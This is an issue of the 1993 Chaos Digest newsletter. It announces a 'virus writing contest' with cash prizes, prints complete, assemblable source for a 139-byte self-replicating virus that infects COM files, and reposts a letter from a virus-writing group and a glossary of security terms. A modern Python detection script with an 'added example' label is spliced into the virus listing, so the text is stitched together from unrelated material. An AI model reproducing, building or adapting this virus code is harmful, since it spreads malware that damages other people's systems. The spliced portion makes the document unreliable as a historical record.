Chaos Digest            Wednesday 17 February 1993          Volume 1 : Number 9

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-Editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.09 (17 Feb 1993)
File 1--Announcement of the 1st "International Computer Virus Writing Contest"
File 2--Example of writing a CPA in 139 bytes
File 3--Can a CPA Creator Be Patriotic?
File 4--Glossary of Computer Insecurity

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost from jbcondat@attmail.com. The editors may be contacted
by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard
Condat, Chaos Computer Club France [CCCF], 47 rue des Rosiers, 93400 St-Ouen,
France

Issues of Chaos-D can also be found on some French BBS. Back issues of ChaosD
can be found on the Internet as part of the Computer underground Digest
archives. They're accessible using anonymous FTP from:

  * ftp.eff.org (192.88.144.4) in /pub/cud
  * red.css.itd.umich.edu (141.211.182.91) in /cud
  * halcyon.com (192.135.191.2) in /pub/mirror/cud
  * ftp.ee.mu.oz.au (128.250.77.2) in /pub/text/CuD
  * nic.funet.fi (128.214.6.100) in /pub/doc/cud

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please avoid
quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.
----------------------------------------------------------------------

Date: Fri Feb 12 18:30:04 GMT 1993
From: jbcondat@attmail.com (Chaos Computer Club France )
Subject: File 1--Announcement of the 1st "Intl. Computer Virus Writing Contest"

               W E L C O M E   T O   T H E   F I R S T

     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     *                                                           *
     *      I N T E R N A T I O N A L   C O M P U T E R          *
     *      V I R U S   W R I T I N G   C O N T E S T            *
     *                                                           *
     * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

                            - 1 9 9 3 -

               Final Date For Submissions: APRIL 1, 1993

This Contest is Sponsored by:

               American Eagle Publications, Inc.
               P. O. Box 41401
               Tucson, AZ 85717 USA

               Publisher of The Little Black Book of Computer Viruses

     * * * * * * * * * * * * * * * * * * * * * * * * * * * *
     ! DISTRIBUTE THIS FILE ALL OVER THE KNOWN UNIVERSE !
     * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Ok, all you genius hackers out there! Here is a challenge for you. Prove your
stuff! This is an INTERNATIONAL contest, and this file is being circulated
all over the world, so if you want to compete, be forewarned, you've got
worldwide competition. Only the best have a chance in this game.

Still up to the challenge? Ok, here it is:

I am writing Volume 2 of The Little Black Book of Computer Viruses. This is a
study of the scientific applications of computer viruses, and their use in
artificial life research, and all of that neat stuff. One of the things I
want to discuss in the book is the limit on the size of a virus for a given
level of functionality. So I took the TIMID virus from Volume 1 and tore it
down to the bare minimum. Not good enough. I wrote a virus that worked a
little differently. I tore that one down to the bare minimum. Good enough?
Well maybe. But maybe not. I have some pretty compact code, but is it the
absolute best? I'm guessing somebody out there can top it.
Here are the rules:

(1) The object of this game is to write the smallest virus you can with the
    required level of functionality.

(2) The virus must be capable of infecting all COM files on the logged drive
    in the current directory of a PC, no matter how many COM files are there.
    It may infect them as quickly or as slowly as you like, so long as it can
    be demonstrated that it will do so in an hour, when running the programs
    in that directory one after the other in sequential order.

(3) The virus must recognize itself and avoid re-infecting files that have
    been infected. At most, only one in fifty thousand files should get
    accidentally re-infected, assuming that the data in unknown COM files is
    random.

(4) The virus must terminate gracefully if it cannot find a file to infect.

(5) The virus must not destroy any of the code in any file which it infects.
    It must allow that code to execute properly, or refuse to infect a file.

(6) The virus must be self-contained. It cannot hide code in some common
    location on disk.

(7) The virus must function properly under MS-DOS 5.0 with no TSR's resident,
    and nothing loaded high.

(8) The size will be determined by the larger of (A) the number of bytes the
    virus code itself takes up in an infected file, and (B) the largest
    number of bytes the virus adds to a program when it infects it.

The best code I have for a virus that follows these rules right now is 139
bytes long. Both source and executable are included in the ZIP, named
LITTLE.ASM and LITTLE.COM. In the event of a tie for size, originality and
ingenuity of the code will break the tie. All judges' decisions are final.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

The winner will receive the following:

(1) A $100 CASH REWARD.

(2) Your code will be published in "The Little Black Book of Computer
    Viruses", Volume 2.
(3) I will give you credit for the code and for winning the International
    Virus Contest in the book, using either your real name or an alias, your
    choice, published in the book.

(4) Your name will be posted on the MISS bulletin board as the contest
    winner.

(5) A free copy of "The Little Black Book of Computer Viruses", Volume 2,
    and a one year subscription to Computer Virus Developments Quarterly
    ($95 value).

Three honorable mention winners will receive a free copy of The Little Black
Book of Computer Viruses, Volume 2.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

You may make an entry in two ways:

(1) Mail your entry on a PC format floppy disk to American Eagle
    Publications, Inc., PO Box 41401, Tucson, AZ 85717 USA.

(2) Upload your entry to the M.I.S.S. bulletin board at (805)251-0564 in the
    USA. Log on as GUEST, password VIRUS, last 4 digits of phone number 0000,
    and upload to the CONTEST UPLOADS directory.

A valid entry consists of the following items:

(A) Complete source code for a virus, which can be assembled using either
    TASM, MASM, or A86. If you use another assembler and don't know if one of
    the above will work, then send the assembler along with the submission.
    If you do anything tricky that we may not understand, you must explain it
    in comments in the assembler source.

(B) A statement of who you are (aliases accepted) and how to get in touch
    with you in case you win the contest. This information will be kept
    strictly confidential, and encrypted at all times.

By submitting an entry to the contest, you agree that the copyright to your
entry will be considered the property of American Eagle Publications. The
copyright to any losing entry will be returned to the owner upon written
request. In the event that you win or receive honorable mention in the
contest, the copyright to the code will remain the property of American Eagle
Publications, Inc.

You may submit your entry encrypted with PGP 2.1 if you desire.
Use the following public key to encrypt:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1

mQBNAitZ9w4AAAECAOXJYOsJNavAAWFBRwf4/u0QWMJ9IHj8eajgOfDRdlCNwEBJ
wMs1vb5GcdJCaeoCgBR3Xxzh6oEo2nrwfru8mqMABRG0CE1BTHVkd2ln
=P6d4
-----END PGP PUBLIC KEY BLOCK-----

Go to it!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

                  D O N ' T   M I S S   O U T ! ! !

Get Your Very Own International Virus Writing Contest 1993 T-SHIRT

Great fun to wear to your local user's group meeting, or the next computer
security conference you attend. Sure to get people's attention and initiate
lots of interesting conversation. Specify Small, Medium, or Large.

Only $9.95 from American Eagle Publications, Inc.
               P.O. Box 41401
               Tucson, AZ 85717

(US Customers please add $3.00 for UPS delivery)
(Overseas customers please add $7.50 for airmail delivery)
(Overseas customers please add $3.00 for surface delivery)
(AZ residents add 5% sales tax)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

American Eagle Publications, Inc., gives you first class information to learn
the ins and outs of viruses. You may order any of the following items from
American Eagle Publications, PO Box 41401, Tucson, AZ 85717. (Shipping is
$2.00 to the US, $7.50 for overseas airmail.) AZ residents add 5% sales tax.

The Little Black Book of Computer Viruses, Volume 1, by Mark Ludwig. This
award-winning book will teach you the basics of how viruses work in
no-nonsense terms. 192 pgs., $14.95.

The Little Black Book of Computer Viruses Program Disk. All of the programs
in the book, both source code and executables, $15.00.

Computer Virus Developments Quarterly. This takes up where the Little Black
Book leaves off, providing the reader with quarterly updates on viruses and
anti-virus technology. For the advanced security specialist or programmer.
One year subscription with diskettes, $75.00 postpaid, overseas airmail add
$10.00.

Computer Virus Developments Quarterly, current single issue, $25.00.
(Please inquire as to price and availability of back issues)

Technical Note #1: The Pakistani Brain Virus, a complete disassembly and
explanation. This is one of the first boot sector viruses ever written, and
the first stealth boot sector virus. It hides on floppy disks and inserts the
label (c) Brain on the disk. 32 page booklet and diskette with assembler
source and compiled virus, $20.00.

Technical Note #2: The Stoned Virus, a complete disassembly and explanation.
The Stoned is the world's most successful boot sector virus. It infects
floppy disks and hard disks. Find out what makes it tick. 24 page booklet and
diskette with assembler source, compiled virus, and detection tool, $20.00.

Technical Note #3: The Jerusalem Virus, a complete disassembly and
explanation. Jerusalem is an old but highly effective virus which hides in
memory, and infects every program you try to execute. It starts deleting
programs on Friday the 13th. Booklet and diskette with assembler source and
compiled virus, $20.00.

Technical Note #4: How to Write Protect an MFM Hard Disk. The only
hard-and-fast way to stop viruses from spreading is to physically
write-protect your disk. This tech note tells you how to do it for the older
MFM style drives. Some companies sell such devices for hundreds of dollars,
but this booklet will tell you how to do the job for under $20. Complete with
theory, circuit diagrams, and a circuit board layout. No diskette, $12.00.

How to Become a Virus Expert, a 60 minute audio tape by author Mark Ludwig
tells you how to get hold of the critical information you need to protect
your computers, and stop relying on some anti-virus product developer to
spoon-feed you. $10.00.

Wanted: Translators for these works in all languages and outlets for these
works in all countries. An opportunity for big $$ awaits the enterprising
person. Please contact us.

+++++++

No Virus Contest is complete without POLITICAL COMMENT:

Freedom is only free if it is VOLUNTARY.
If you live in a "democratic" nation that will not allow secession, then you
DO NOT live in a free country. The democracies of this world are learning how
to become tyrannies. Support a Secession Amendment for your constitution,
before it is too late and you wish you had. Secession is the only logical way
to short-circuit the trend toward big government and tyranny, short of
all-out civil war.

+++++++

------------------------------

Date: Fri Feb 12 18:30:04 GMT 1993
From: jbcondat@attmail.com (Chaos Computer Club France )
Subject: File 2--Example of writing a CPA in 139 bytes

;A small (139 byte) virus with minimal required functionality.
;This Virus is for research purposes only. Please do not release!
;Please execute it only on a carefully controlled system, and only
;if you know what you're doing!
;
;An example for
;#######################################################
;#   THE FIRST INTERNATIONAL VIRUS WRITING CONTEST     #
;#                    1 9 9 3                          #
;#                  sponsored by                       #
;#          American Eagle Publications, Inc.          #
;#######################################################
;
;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
;Link as "TLINK /T LITTLE;"
;
;Basic explanation of how this virus works:
;
;The virus takes control when the program first starts up. All of its code
;is originally located at the start of a COM file that has been infected.
;When the virus starts, it takes over a segment 64K above the one where the
;program was loaded by DOS. It copies itself up there, and then searches
;for an uninfected file. To determine if a file is infected, it checks the
;first two bytes to see if they are the same as its first two bytes. It
;reads the file into memory right above where it is sitting (at 100H in the
;upper segment). If not already infected, it just writes itself plus the
;file it infected back out to disk under the same file name. Then it moves
;the host in the lower segment back to offset 100H and executes it.
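The infection layout just described (virus image first, host written back unchanged after it, the first two bytes serving as the self-recognition mark), seen from the detection and clean-up side. This is an added example and is not part of the contest entry or the listing; the virus image it scans for is a constructed stand-in, while the 139-byte length, the two-byte mark and the 1-in-50,000 bound of rule (3) are taken from the contest text.

```python
# Detection and clean-up logic for a prepending COM infector of the kind the
# listing describes: the virus image sits at the start of the infected file,
# the original host follows it unchanged, and infection is recognised by
# comparing a file's first two bytes with the virus's own first two bytes.
# Added example, not the contest code. FAKE_VIRUS is a constructed stand-in
# image (no real code); VIRUS_LEN is the 139 bytes stated in the text.

VIRUS_LEN = 139   # bytes the listing prepends (OFFSET HOST - 100H = 8BH)
MARK_LEN = 2      # the listing compares a file's first two bytes with its own

# Constructed stand-in: MARK_LEN marker bytes followed by filler, VIRUS_LEN long.
FAKE_VIRUS = b"\xaa\x55" + bytes(VIRUS_LEN - MARK_LEN)

# The listing's dummy host: mov ax,4C00H / int 21H (a clean 5-byte COM file).
DUMMY_HOST = b"\xb8\x00\x4c\xcd\x21"


def is_infected(image: bytes, virus: bytes) -> bool:
    """Same test the listing applies: the file's first MARK_LEN bytes match.

    A file shorter than the virus cannot be an infected host, so it is
    rejected even if its leading bytes happen to match (see reinfection_rate).
    """
    return len(image) >= len(virus) and image[:MARK_LEN] == virus[:MARK_LEN]


def disinfect(image: bytes, virus: bytes) -> bytes:
    """Recover the host by dropping the prepended virus image."""
    if not is_infected(image, virus):
        raise ValueError("file does not carry the infection marker")
    return image[len(virus):]


def added_size(clean: bytes, infected: bytes) -> int:
    """Rule (8)(B): number of bytes the virus added to a program."""
    return len(infected) - len(clean)


def contest_size(virus: bytes, clean: bytes, infected: bytes) -> int:
    """Rule (8): the larger of the virus's own footprint and the growth it causes."""
    return max(len(virus), added_size(clean, infected))


def reinfection_rate(mark_len: int = MARK_LEN) -> float:
    """Rule (3): chance that random COM data happens to match a mark_len-byte
    marker and is therefore skipped (or, for a cleaner, wrongly stripped)."""
    return 1.0 / (256 ** mark_len)


def scan(files: dict, virus: bytes) -> dict:
    """Map file name -> (infected?, host length after clean-up)."""
    report = {}
    for name, image in files.items():
        hit = is_infected(image, virus)
        report[name] = (hit, len(disinfect(image, virus)) if hit else len(image))
    return report


if __name__ == "__main__":
    # Constructed directory: one clean host, one infected copy, one file that
    # merely starts with the marker bytes but is too short to be infected.
    samples = {
        "CLEAN.COM": DUMMY_HOST,
        "INFECTED.COM": FAKE_VIRUS + DUMMY_HOST,
        "LUCKY.COM": b"\xaa\x55\x90",
    }
    for name, (hit, host_len) in scan(samples, FAKE_VIRUS).items():
        print(f"{name:13s} infected={hit!s:5s} host bytes={host_len}")
    print("contest size:", contest_size(FAKE_VIRUS, DUMMY_HOST, FAKE_VIRUS + DUMMY_HOST))
    print("false re-infection rate:", reinfection_rate(), "<", 1 / 50000)
```

A clean file of at least 139 bytes whose first two bytes happen to equal the marker is indistinguishable from an infected one by this test alone, which is exactly the 1-in-65,536 case rule (3) tolerates.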
        .model  tiny                    ;Tiny model to create a COM file
        .code

;DTA definitions
DTA     EQU     0000H                   ;Disk transfer area
FSIZE   EQU     DTA+1AH                 ;file size location in file search
FNAME   EQU     DTA+1EH                 ;file name location in file search

        ORG     100H

;*************************************************************************
;The virus starts here.

VIRSTART:
        mov     ax,ds
        add     ax,1000H
        mov     es,ax                   ;upper segment is this one + 1000H
        mov     si,100H                 ;put virus in the upper segment
        mov     di,si                   ;at offset 100H
        mov     cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM
        mov     cl,8BH                  ;we can assume ch=0
        rep     movsb                   ;this will louse the infection up if run
                                        ;under debug!
        mov     ds,ax                   ;set ds to high segment
        push    ds
        mov     ax,OFFSET FIND_FILE
        push    ax
        retf                            ;jump to high memory segment

;Now it's time to find a viable file to infect. We will look for any COM
;file and see if the virus is there already.

FIND_FILE:
        xor     dx,dx                   ;move dta to high segment
        mov     ah,1AH                  ;so we don't trash the command line
        int     21H                     ;which the host is expecting
        mov     dx,OFFSET COMFILE
        mov     ch,3FH                  ;search for any file, no matter what
                                        ;attribute (note: cx=0 before this instr)
        mov     ah,4EH                  ;DOS search first function
        int     21H
CHECK_FILE:
        jc      ALLDONE                 ;no COM files to infect
        mov     dx,FNAME                ;first open the file
        mov     ax,3D02H                ;r/w access open file, since we'll want to write to it
        int     21H
        jc      NEXT_FILE               ;error opening file - quit and say this
                                        ;file can't be used
        mov     bx,ax                   ;put file handle in bx, and leave it there
                                        ;for the duration
        mov     di,FSIZE
        mov     cx,[di]                 ;get file size for reading into buffer
        mov     dx,si                   ;and read file in at HOST in new segment
                                        ;(note si=OFFSET HOST)
        mov     ah,3FH                  ;DOS read function
        int     21H
        mov     ax,[si]                 ;si=OFFSET HOST here
        jc      NEXT_FILE               ;skip file if error reading it
        cmp     ax,WORD PTR [VIRSTART]  ;see if infected already
        jnz     INFECT_FILE             ;nope, go do it
        mov     ah,3EH                  ;else close the file
        int     21H                     ;and fall through to search for another file
NEXT_FILE:
        mov     ah,4FH                  ;look for another file
        int     21H
        jmp     SHORT CHECK_FILE        ;and go check it out

COMFILE DB      '*.COM',0

;When we get here,
;we've opened a file successfully, and read it into
;memory. In the high segment, the file is set up exactly as it will look
;when infected. Thus, to infect, we just rewrite the file from the start,
;using the image in the high segment.

INFECT_FILE:
        xor     cx,cx
        mov     dx,cx                   ;reset file pointer to start of file
        mov     ax,4200H
        int     21H
        mov     ah,40H
        mov     dx,100H
        mov     cx,WORD PTR [di]        ;adjust size of file for infection
        add     cx,OFFSET HOST - 100H
        int     21H                     ;write infected file
        mov     ah,3EH                  ;close the file
        int     21H

;The infection process is now complete. This routine moves the host
;program down so that its code starts at offset 100H, and then transfers
;control to it.

ALLDONE:
        mov     ax,ss                   ;set ds, es to low segment again
        mov     ds,ax
        mov     es,ax
        push    ax                      ;prep for retf to host
        shr     dx,1                    ;restore dta to original value
        mov     ah,1AH                  ;for compatibility
        int     21H
        mov     di,100H                 ;prep to move host back to original location
        push    di
        mov     cx,sp                   ;move code, but don't trash the stack
        sub     cx,si
        mov     cx,0FE6FH               ;hand code the above to save a byte
        rep     movsb                   ;move code
        retf                            ;and return to host

;***************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.

HOST:
        mov     ax,4C00H                ;Terminate, error code = 0
        int     21H
HOST_END:

        END     VIRSTART

------------------------------

Date: 29 Jan 93 15:59:00 +0000
From: ercm20@festival.edinburgh.ac.uk (Sam Wilson )
Subject: File 3--Can a CPA Creator Be Patriotic?
Repost: Virus-L Digest #6.16 (4 Feb 93)

The following letter and editorial response appear in the February 1993
issue of the UK magazine 'Personal Computer World' under the heading
"Spreading viruses":

We are a bunch of programmers who, depressed with the lack of viruses that
have originated in England, have sought to change matters. We presently
write viruses for the PC, Archimedes and Atari ST.
We have increased the few viruses written in England by about 25, though this
number is increasing all the time as our programmers churn out more quality
computer viruses. Although there are many viruses about we hope to dominate
the UK 'market'. Won't it be nice, though, for England to have at least one
export?

Finally, we as an organisation like to stress that, contrary to public
opinion, we are *not* boring people who wear anoraks, nor are we depraved
people who were beaten as children and so grew up with a hatred of humanity.
We are highly intelligent and good at programming and are just ordinary
people. But we are gonna get you soon!

ARCV (Association of Really Cruel Viruses)

[And the editor replies:]

You say you're not depraved people? Perhaps you weren't beaten as children,
but as far as we're concerned you should be beaten as adults.

I wish it were the April issue...

Sam Wilson
Network Services Division
Computing Services, The University of Edinburgh
Edinburgh, Scotland, UK

------------------------------

Date: Fri, 12 Feb 93 23:26:52 +0000
From: tegra!vail@uunet.UU.NET (Johnathan Vail )
Subject: File 4--Glossary of Computer Insecurity
Repost from: Virus-L Digest #6.26 (16 Feb 1993)

________________________________________________________________________

                      Glossary of Computer Insecurity

               Compiled by Johnathan Vail (vail@tegra.com)
            Created by several people on the comp.virus newsgroup

________________________________________________________________________

async interrupt (attack) - To exploit system vulnerabilities arising from
deficiencies in the interrupt management facilities of an operating system.

back door - This is an undocumented feature added to a product which can
allow those who know about it to gain access to features that are otherwise
protected. The original Tempest video game was supposed to have a key
sequence that would allow the author of the firmware to get free games in an
arcade.
Some military systems are rumored to have back doors in their software that
prevent their being used against the countries that built them.

blivet (attack) - A denial-of-service attack performed by hogging limited
resources that have no access controls (for example, shared spool space on a
multi-user system). [Classically defined as "ten pounds of horsesh*t in a
five pound bag"]

browsing - Gaining unauthorized read-only access to files.

C2 Catch-22 - Refers to the paradox that all federal computers are required
to be certified to the C2 level of Trust (or better) by 1992 (especially if
they are to be permitted access to a network), yet because no C2
certification has ever been performed with the network software active, NSA
will revoke the certification of any system as soon as it is connected to a
network. [Also "C2-by-'92 Catch-22".]

cascading - To gain additional privileges on a host (or within a process) by
using those privileges legitimately (if perhaps unwisely) granted to casual
users.

crayola books - A disparaging reference to the "rainbow books", commonly used
when referring to the upcoming rewrite of NSA's technical computer security
guidelines.

crypt (attack) - Stealing the system password file and looking for known
encrypted passwords.

data diddling - To alter another's data (especially, to do so subtly so it
will not be detected); a major breach of the hacker ethic.

denial-of-service attack - Any method which an intruder might use to injure
authorized users of a system by making its facilities unavailable. Often
easier to accomplish than hijacking a privileged account.

dictionary (attack) - Trying a dictionary of commonly used or vendor
installed passwords.

Easter Egg - This is a usually benign feature added to a product by the
programmer without official knowledge or consent. One example of this is the
'xyzzy' command in Data General's AOS operating system. Another is the
"RESIST THE DRAFT" message in an unused sector of Apple Logo.
ethical hacker - Someone who espouses the view that he/she may "ethically"
penetrate any computer or network so long as no data is altered.
[Colloquially among computer security professionals: a dead hacker (or one
who has ceased hacking).]

leapfrog (attack) - Using userid and password information obtained illicitly
from one host (e.g., downloading a file of account IDs and passwords, tapping
TELNET, etc.) to compromise another host. Also, to TELNET through one or more
hosts in order to confuse a trace (standard cracker procedure).

masquerading - To assume the identity of another user to gain unauthorized
access to a host or network.

mockingbird - Software that intercepts communications (especially logon
processes) between users and hosts and provides system-like responses to the
users while obtaining information (especially account IDs and passwords).

pest - A set of instructions that self-replicates uncontrollably, eventually
rendering a network or system unusable via a blivet attack. [sometimes called
"wabbits"]

phage - An autonomous program that inserts malicious code into other
autonomous programs (e.g., a computer worm or probe that carries a virus or
trojan horse program).

polymorphic virus - 1. A virus using variable encryption with a variable
decryption routine to avoid detection by its "signature". V2P6, Whale,
Maltese, Amoeba, Russian Mutant and PC-Flu 2 are examples. 2. Any virus that
changes its behaviour, such as infecting different types of host or changing
its mode of operation. A virus that infects both .COM and .EXE programs as
well as boot sectors can be considered polymorphic.

probe - A non-self-replicating, autonomous program (or set of programs) that
has the ability to execute indirectly through a network or multi-partition
computer system (e.g., various hacker utilities).

rainbow books - NSA's technical computer security guidelines. So named
because each of the books is published with a different color cover. [See
"crayola books".]
scavenging - To exploit unerased residual data. The controversy with the
Prodigy service [users finding pieces of their data in the STAGE.DAT file]
is an alleged example of this.

spoofing - An attack which relies on the inability of users or computer
systems to verify the identity or location of a communication partner. A
`mockingbird' spoofs the computer's login sequence to fool a user; some
cracking software repeatedly spoofs human login actions to fool the computer.

stealth virus - A type of virus that attempts to hide its existence. A common
way of doing this on IBM PCs is for the virus to hook itself into the BIOS or
DOS and trap sector reads and writes that might reveal its existence.

trapdoor - A method of bypassing a sequence of instructions, often some part
of the security code (e.g. the computer logon).

time bomb - This is code or a program that checks the system's clock in order
to trigger its active symptoms. The popular legend of the time bomb is the
programmer that installs one in his employer's computers to go off in case he
is laid off or fired.

trojan (horse) - This is some (usually nasty) code that is added to, or in
place of, a harmless program. This could include many viruses but is usually
reserved to describe code that does not replicate itself.

unknown system-state (attack) - To exploit the conditions that occur after a
partial or total system crash (e.g., some files remain open without an
end-of-file condition, allowing an intruder to obtain unauthorized access to
other files by reading beyond the real EOF when service is resumed).

virus - A piece of code that is executed as part of another program and can
replicate itself in other programs. The analogy to real viruses is pertinent
("a core of nucleic acid, having the ability to reproduce only inside a
living cell"). Most viruses on PCs really are viruses.

worm - An autonomous program (or set of programs) that can replicate itself,
usually over a network.
A worm is a complete program by itself, unlike a virus, which is either part
of another program or requires another program's thread of execution to
operate. Robert Morris's program, the Internet Worm, is an example of a worm
although it has been mistakenly identified in the popular media as a virus.

________________________________________________________________________

 _____
|     |  Johnathan Vail      vail@tegra.com           (508) 663-7435
|Tegra|  jv@n1dxg.ampr.org   N1DXG@448.625-(WorldNet)
 -----   MEMBER: League for Programming Freedom (league@prep.ai.mit.edu)

------------------------------

End of Chaos Digest #1.09
************************************